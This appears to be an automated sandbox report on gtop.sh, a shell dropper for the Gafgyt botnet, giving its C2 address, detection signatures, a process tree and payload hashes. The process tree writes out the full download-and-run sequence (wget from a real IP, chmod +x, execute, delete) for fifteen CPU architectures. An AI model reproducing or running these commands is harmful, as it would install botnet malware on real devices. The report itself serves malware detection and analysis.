Analysis
  max time kernel:  104s
  max time network: 128s
  platform:         ubuntu-18.04_amd64
  resource:         ubuntu1804-amd64-20240729-en
  resource tags:    arch:amd64, arch:i386, image:ubuntu1804-amd64-20240729-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
  submitted:        23-12-2024 04:11
Static task
  static1
Behavioral tasks
  behavioral1: sample gtop.sh, resource ubuntu1804-amd64-20240729-en
  behavioral2: sample gtop.sh, resource debian9-armhf-20240418-en
  behavioral3: sample gtop.sh, resource debian9-mipsbe-20240611-en
  behavioral4: sample gtop.sh, resource debian9-mipsel-20240611-en
General
  Target: gtop.sh
  Size:   2KB
  MD5:    38530bb2fc22c035260c8a4fb33ee8ba
  SHA1:   a442c5ef953468e28f7da8d1bae9428f571dc587
  SHA256: 1b099d704be7ad0232861396b44a8e0bf2578f6a57294a213ed727f28bc52f3b
  SHA512: b7d21f550985a44d48484f62b010ecb22d5a0474b56470f0c4cc323ea6ac7023cda4486fc5ade21392ed7841f8f520e9c11a903897e4f494b796b5b579e27dc7
Malware Config
  Extracted: gafgyt
  Address:   154.213.186.115:4444
Signatures

  Detected Gafgyt variant (15 IoCs)
    resource                           yara_rule
    behavioral1/files/fstream-1.dat    family_gafgyt
    behavioral1/files/fstream-2.dat    family_gafgyt
    behavioral1/files/fstream-3.dat    family_gafgyt
    behavioral1/files/fstream-4.dat    family_gafgyt
    behavioral1/files/fstream-5.dat    family_gafgyt
    behavioral1/files/fstream-6.dat    family_gafgyt
    behavioral1/files/fstream-7.dat    family_gafgyt
    behavioral1/files/fstream-8.dat    family_gafgyt
    behavioral1/files/fstream-9.dat    family_gafgyt
    behavioral1/files/fstream-10.dat   family_gafgyt
    behavioral1/files/fstream-11.dat   family_gafgyt
    behavioral1/files/fstream-12.dat   family_gafgyt
    behavioral1/files/fstream-13.dat   family_gafgyt
    behavioral1/files/fstream-14.dat   family_gafgyt
    behavioral1/files/fstream-15.dat   family_gafgyt

  Gafgyt family

  File and Directory Permissions Modification (1 TTPs, 15 IoCs)
    Adversaries may modify file or directory permissions to evade defenses.
    pid    Process
    1534   chmod
    1546   chmod
    1508   chmod
    1523   chmod
    1528   chmod
    1577   chmod
    1518   chmod
    1540   chmod
    1552   chmod
    1562   chmod
    1513   chmod
    1557   chmod
    1567   chmod
    1572   chmod
    1582   chmod

  Executes dropped EXE (15 IoCs)
    ioc                   pid    Process
    /tmp/jackmymips       1509   jackmymips
    /tmp/jackmymips64     1514   jackmymips64
    /tmp/jackmymipsel     1519   jackmymipsel
    /tmp/jackmysh4        1524   jackmysh4
    /tmp/jackmyx86        1529   jackmyx86
    /tmp/jackmyi486       1535   jackmyi486
    /tmp/jackmyi586       1541   jackmyi586
    /tmp/jackmyi686       1547   jackmyi686
    /tmp/jackmypowerpc    1553   jackmypowerpc
    /tmp/jackmym86k       1558   jackmym86k
    /tmp/jackmysparc      1563   jackmysparc
    /tmp/jackmyarmv4      1568   jackmyarmv4
    /tmp/jackmyarmv4tl    1573   jackmyarmv4tl
    /tmp/jackmyarmv5      1578   jackmyarmv5
    /tmp/jackmyarmv6      1583   jackmyarmv6

  Reads system routing table (1 TTPs, 4 IoCs)
    Gets active network interfaces from /proc virtual filesystem.
    description                 ioc                Process
    File opened for reading     /proc/net/route    jackmyx86
    File opened for reading     /proc/net/route    jackmyi486
    File opened for reading     /proc/net/route    jackmyi586
    File opened for reading     /proc/net/route    jackmyi686

  Reads system network configuration (1 TTPs, 4 IoCs)
    Uses contents of /proc filesystem to enumerate network settings.
    description                 ioc                Process
    File opened for reading     /proc/net/route    jackmyx86
    File opened for reading     /proc/net/route    jackmyi486
    File opened for reading     /proc/net/route    jackmyi586
    File opened for reading     /proc/net/route    jackmyi686

  System Network Configuration Discovery (1 TTPs, 9 IoCs)
    Adversaries may gather information about the network configuration of a system.
    pid    Process
    1512   wget
    1516   rm
    1517   wget
    1521   rm
    1504   wget
    1509   jackmymips
    1511   rm
    1514   jackmymips64
    1519   jackmymipsel

  Writes file to tmp directory (15 IoCs)
    Malware often drops required files in the /tmp directory.
    description                      ioc                   Process
    File opened for modification     /tmp/jackmyi486       wget
    File opened for modification     /tmp/jackmyi686       wget
    File opened for modification     /tmp/jackmym86k       wget
    File opened for modification     /tmp/jackmyi586       wget
    File opened for modification     /tmp/jackmyarmv4      wget
    File opened for modification     /tmp/jackmyarmv4tl    wget
    File opened for modification     /tmp/jackmysh4        wget
    File opened for modification     /tmp/jackmyx86        wget
    File opened for modification     /tmp/jackmypowerpc    wget
    File opened for modification     /tmp/jackmysparc      wget
    File opened for modification     /tmp/jackmyarmv5      wget
    File opened for modification     /tmp/jackmymips       wget
    File opened for modification     /tmp/jackmymips64     wget
    File opened for modification     /tmp/jackmymipsel     wget
    File opened for modification     /tmp/jackmyarmv6      wget
Processes
  Process tree (child processes indented under their parent). Each entry: PID, image path, command line, [signatures triggered].

  1503  /tmp/gtop.sh         /tmp/gtop.sh
    1504  /usr/bin/wget        wget http://154.213.186.115/jackmymips        [System Network Configuration Discovery; Writes file to tmp directory]
    1508  /bin/chmod           chmod +x jackmymips                           [File and Directory Permissions Modification]
    1509  /tmp/jackmymips      ./jackmymips                                  [Executes dropped EXE; System Network Configuration Discovery]
    1511  /bin/rm              rm -rf jackmymips                             [System Network Configuration Discovery]
    1512  /usr/bin/wget        wget http://154.213.186.115/jackmymips64      [System Network Configuration Discovery; Writes file to tmp directory]
    1513  /bin/chmod           chmod +x jackmymips64                         [File and Directory Permissions Modification]
    1514  /tmp/jackmymips64    ./jackmymips64                                [Executes dropped EXE; System Network Configuration Discovery]
    1516  /bin/rm              rm -rf jackmymips64                           [System Network Configuration Discovery]
    1517  /usr/bin/wget        wget http://154.213.186.115/jackmymipsel      [System Network Configuration Discovery; Writes file to tmp directory]
    1518  /bin/chmod           chmod +x jackmymipsel                         [File and Directory Permissions Modification]
    1519  /tmp/jackmymipsel    ./jackmymipsel                                [Executes dropped EXE; System Network Configuration Discovery]
    1521  /bin/rm              rm -rf jackmymipsel                           [System Network Configuration Discovery]
    1522  /usr/bin/wget        wget http://154.213.186.115/jackmysh4         [Writes file to tmp directory]
    1523  /bin/chmod           chmod +x jackmysh4                            [File and Directory Permissions Modification]
    1524  /tmp/jackmysh4       ./jackmysh4                                   [Executes dropped EXE]
    1526  /bin/rm              rm -rf jackmysh4
    1527  /usr/bin/wget        wget http://154.213.186.115/jackmyx86         [Writes file to tmp directory]
    1528  /bin/chmod           chmod +x jackmyx86                            [File and Directory Permissions Modification]
    1529  /tmp/jackmyx86       ./jackmyx86                                   [Executes dropped EXE; Reads system routing table; Reads system network configuration]
    1532  /bin/rm              rm -rf jackmyx86
    1533  /usr/bin/wget        wget http://154.213.186.115/jackmyi486        [Writes file to tmp directory]
    1534  /bin/chmod           chmod +x jackmyi486                           [File and Directory Permissions Modification]
    1535  /tmp/jackmyi486      ./jackmyi486                                  [Executes dropped EXE; Reads system routing table; Reads system network configuration]
    1538  /bin/rm              rm -rf jackmyi486
    1539  /usr/bin/wget        wget http://154.213.186.115/jackmyi586        [Writes file to tmp directory]
    1540  /bin/chmod           chmod +x jackmyi586                           [File and Directory Permissions Modification]
    1541  /tmp/jackmyi586      ./jackmyi586                                  [Executes dropped EXE; Reads system routing table; Reads system network configuration]
    1544  /bin/rm              rm -rf jackmyi586
    1545  /usr/bin/wget        wget http://154.213.186.115/jackmyi686        [Writes file to tmp directory]
    1546  /bin/chmod           chmod +x jackmyi686                           [File and Directory Permissions Modification]
    1547  /tmp/jackmyi686      ./jackmyi686                                  [Executes dropped EXE; Reads system routing table; Reads system network configuration]
    1550  /bin/rm              rm -rf jackmyi686
    1551  /usr/bin/wget        wget http://154.213.186.115/jackmypowerpc     [Writes file to tmp directory]
    1552  /bin/chmod           chmod +x jackmypowerpc                        [File and Directory Permissions Modification]
    1553  /tmp/jackmypowerpc   ./jackmypowerpc                               [Executes dropped EXE]
    1555  /bin/rm              rm -rf jackmypowerpc
    1556  /usr/bin/wget        wget http://154.213.186.115/jackmym86k        [Writes file to tmp directory]
    1557  /bin/chmod           chmod +x jackmym86k                           [File and Directory Permissions Modification]
    1558  /tmp/jackmym86k      ./jackmym86k                                  [Executes dropped EXE]
    1560  /bin/rm              rm -rf jackmym86k
    1561  /usr/bin/wget        wget http://154.213.186.115/jackmysparc       [Writes file to tmp directory]
    1562  /bin/chmod           chmod +x jackmysparc                          [File and Directory Permissions Modification]
    1563  /tmp/jackmysparc     ./jackmysparc                                 [Executes dropped EXE]
    1565  /bin/rm              rm -rf jackmysparc
    1566  /usr/bin/wget        wget http://154.213.186.115/jackmyarmv4       [Writes file to tmp directory]
    1567  /bin/chmod           chmod +x jackmyarmv4                          [File and Directory Permissions Modification]
    1568  /tmp/jackmyarmv4     ./jackmyarmv4                                 [Executes dropped EXE]
    1570  /bin/rm              rm -rf jackmyarmv4
    1571  /usr/bin/wget        wget http://154.213.186.115/jackmyarmv4tl     [Writes file to tmp directory]
    1572  /bin/chmod           chmod +x jackmyarmv4tl                        [File and Directory Permissions Modification]
    1573  /tmp/jackmyarmv4tl   ./jackmyarmv4tl                               [Executes dropped EXE]
    1575  /bin/rm              rm -rf jackmyarmv4tl
    1576  /usr/bin/wget        wget http://154.213.186.115/jackmyarmv5       [Writes file to tmp directory]
    1577  /bin/chmod           chmod +x jackmyarmv5                          [File and Directory Permissions Modification]
    1578  /tmp/jackmyarmv5     ./jackmyarmv5                                 [Executes dropped EXE]
    1580  /bin/rm              rm -rf jackmyarmv5
    1581  /usr/bin/wget        wget http://154.213.186.115/jackmyarmv6       [Writes file to tmp directory]
    1582  /bin/chmod           chmod +x jackmyarmv6                          [File and Directory Permissions Modification]
    1583  /tmp/jackmyarmv6     ./jackmyarmv6                                 [Executes dropped EXE]
    1585  /bin/rm              rm -rf jackmyarmv6
Network
MITRE ATT&CK Enterprise v15
Downloads

  Download 1
    Filesize: 167KB
    MD5:      d00be981681e272f97c7ae6e0d72a679
    SHA1:     76e316df4e70371cc1a0e1a718c4a148564ca13b
    SHA256:   2359a71e62d525ef2cc8041db19e15a51eb3201692869b7a75bd6d9977b84f08
    SHA512:   0ab8f509f9197c2130bb7bc36bc5de6f23d6c55a793158d1c8b2e9eff49d8b8bc69ac7edb994f78728f72de6e874af47bd7a84e36162e79dadcc0c7ba75271e0

  Download 2
    Filesize: 166KB
    MD5:      8701802700912d0bc573d75d76bf4d30
    SHA1:     bcf66b86849b6c6a5977a102c67737723d9ace0d
    SHA256:   d338bd034f546e5756e2ebb0def390b32a13565a10e821ca8eee2eaa5468c07f
    SHA512:   74bd2a2a81f2dec0fa278d1aa02bfa20be97884fb7ccd2ccf4aaf2dfa07cbcc5314f7d1125c730a5209ef3abbeec7cc9e672fe32e8359522c9487f28f8bd5c7f

  Download 3
    Filesize: 166KB
    MD5:      795d887687193140ee04711c54574ab5
    SHA1:     35ac21f15d9be9c9da1b22acefefbf466ad154f4
    SHA256:   f25d5d4a126acb25c26694b0d37455b757f6607a9bc33ee4a71f50b5506292a5
    SHA512:   5c687bcb950fae7738c4b65f67a0612f1f86338b92867deb1611b9483dfbc04b202edd158a9108be5d55350b717a64922050965e48907ff8066542eb4534c614

  Download 4
    Filesize: 166KB
    MD5:      f8267e8d44d86203d2560d280b66bd36
    SHA1:     5a1c5e5caeacdf01af8c44bcbe1625b7ad0eb0fb
    SHA256:   a3360319b5713fa0352e837562c56a8fa34ff656a506763ca7e809d120e57980
    SHA512:   7b7398311260831b8428e76c46f31297dbfcae42c5c41c87c0644892854b0477406641bd0d5e7af03c7190a8fac38ac0c3cded5341f4f07dbfb974b8275b934e

  Download 5
    Filesize: 126KB
    MD5:      37bc4b1d4fce9500ee4fee154e61d9e6
    SHA1:     6fddc8858547e60672cca66857ceb7293638a057
    SHA256:   72071458112606424f8eb5e064a29f4ab4016d3971da7f89e62785abeb9cbb9c
    SHA512:   3db6d2ed8a079792d9fc024a9e98a7cf6959ca446c4944726707c48a93775c5b40b2b9d46150a287561a4fdc6a1aa21310d8271ac521b40a733d15f07623d8eb

  Download 6
    Filesize: 135KB
    MD5:      4ca387e1408f29f6ed1979acfb671f82
    SHA1:     3467879b5fd631a5884f947ba013d61ea8a33c91
    SHA256:   1f7ba28d9d2ea091a89b2f7e4131b76163a6dcfb696cc34b073de8c9bf8afc4d
    SHA512:   18995f38839a98d0d478dad4b4b000e478effd1acaea865a5e947454e1d17d296ae519556f1a30f875b505f38f298440d20ff988440457907d5dd3ae9492c738

  Download 7
    Filesize: 139KB
    MD5:      1aeb2935aec67978bfdab8243470b577
    SHA1:     b26b260d86609e9c758279c59eb8caec53fd0f69
    SHA256:   936937cb11ad426210af65f850f4afee5713e324ad703a12d0b5f687ea84cf57
    SHA512:   3843063e037212bc1a60b67a69407cb466ee67d6d9935018f7fcebe5536c4be078cc797865cdfafd2f9073cec8c6425546089aee641d3788b61f4238a15748ce

  Download 8
    Filesize: 155KB
    MD5:      a26f6fdf41bb8e4034409fb84adc83ba
    SHA1:     8c03a273bdd2e8f54994d0d061fe259a2968ff41
    SHA256:   7911664055520934019ddfa554219500fa5a038268c828a02b05aa6ad198fbbd
    SHA512:   dcdf2befd602bee0a56c2a05e01171cb24aada733531e479b157ccb8a6d494c3c1fcaa261b813e4eedc498bdc3ba5664e6e3b4c42ce713cfe2d5a5dcc27cb897

  Download 9
    Filesize: 199KB
    MD5:      f2ab2725ea6c883a5c608bc365c41fe5
    SHA1:     454d6983d9a7bb59aa0441b2c2cc805a97738e66
    SHA256:   531e818ee346f15e78c4f08d8de52a64597e10ce744b1be9dd2137eb1cd78c1d
    SHA512:   572183decc9a9ee8878e77485db9a22b6b0606e667743788eb5f5b1f8f35522505c216fe027931fa8913989053fa346b46b78c6b2209ecd53630bbc14e1d3a26

  Download 10
    Filesize: 244KB
    MD5:      89655c0a64c3552ee71dc901a3561ad1
    SHA1:     8a488927882c18b5a35da06c6428f8707d4314ad
    SHA256:   08d4aed11bff7d311aa206396b2651f2e587e0fbe41d2688281ad4e0f6322d04
    SHA512:   23c581fe1ca57cc3dc9a7efeeee4d97eb5f97ac92ed3cf1f4af4e8d2caa467aa6e826a29f01a67b9dcc8609e77e76e9d23ee985f770fada89a9acab484c9af6f

  Download 11
    Filesize: 199KB
    MD5:      caabd697c443462f0a04d6b30529df58
    SHA1:     4fcb97074d1971ebfa482aad5edf208b43b6d819
    SHA256:   5259f289b8841e6beb9718c486210857edac40b5c206e5949fa5402b861849cf
    SHA512:   abf9607d8d332eca40f19ffef0866414fa353f12663c3dd232dd190954ab4f401f69cc9e84f669910c801a30df62bba8f00425aac5b1bfd99e756bdd4277a1a8

  Download 12
    Filesize: 150KB
    MD5:      29f174a35d868d69945c412c159184dd
    SHA1:     7ac1d35bdbe15fed8443341de0875579ec8099d0
    SHA256:   b9966986b49c8db77d7909f17e743e4e7f6df00379a990467d62db55c69a3b7b
    SHA512:   6047582863aca61d2e8925f2fa6e4cc4eecdcd4095b76ea276e9489f7da1fc54503a01370f4f2f4553d144818cfa6b8324fdf772d92ecdcca57465904f012899

  Download 13
    Filesize: 146KB
    MD5:      2a8e0da501cea8f8d32893a5fd6c9aab
    SHA1:     29b2be373b4155632926b9656861bebd53264473
    SHA256:   17f492bbf1085e3cec77c8b46831a7d2ef4662d0162377358e17296bebbb08d1
    SHA512:   64764a34cd7e8b7be0220519910b6f5a7e3c47340e45450e4e368515dca6c73ab3bbe11726f380533e11bc4ec840838d73a5dcc4720c93c96bb2b1444eedf6c7

  Download 14
    Filesize: 167KB
    MD5:      8ad1c29bcb5557ee83c64f35b9b46b2e
    SHA1:     0fabfb4c79ff14fdacef575b3728561a8e557a77
    SHA256:   d44b79302f6bb77b6432c8074582a5e2df2c9d24404bc3dc17441f59e22284ca
    SHA512:   a3c8a68708056e0cd4aa9d5cae1c865eb381ec62f316aab48e38cdcb4ef0be3abc8daf30e4c888766211c2eaa433c7fe15e85efd3b14b35a5f3de5ab6e2ac2e6

  Download 15
    Filesize: 156KB
    MD5:      afcb3a143b9f4e3a985c3eeb2e2ae4c8
    SHA1:     295f0e0380f71feb1c8911e29882db6a792bbd58
    SHA256:   fd0b10b636f99ee5e527b266d917c41d33230ad6bf600454e10b3e106db1031c
    SHA512:   b6124a40e8a5e7ff49df9b11e3b5097ac9e81b76c6146d902600f50de431e535136d22d63a34736b3fc53121ad0fa2d6b00af18b1ce834997c94c8eb288f5b08